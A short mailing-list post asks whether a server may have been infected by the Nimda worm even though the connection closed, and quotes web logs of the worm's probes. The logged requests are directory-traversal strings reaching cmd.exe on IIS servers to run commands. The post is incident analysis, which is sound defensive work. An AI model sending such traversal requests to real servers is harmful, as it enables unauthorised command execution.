Nimda Question

[patrick.patenaude () bell ca]

I am a little confused over a couple of log results I have picked up.
One has a connection closed and the other not. I know this is NIMDA, can
someone confirm that even if the connection got closed that it is
possible that the server got infected. I do not have access to the
server so I can not look into it right now..

 

Here are the logs:

 

This is one server several attempts;

 

GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dr r HTTP/1.0..Host:
www..Connnection: close....

 

GET
/msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe
?/c+dir 32/cmd.exe?/c+dir HTTP/1.0..Host: www..Connnection: close....

 

GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
c+dir HTTP/1.0..Host: www..Connnection: close....

 

 

Here is the other server

 

GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir..ir..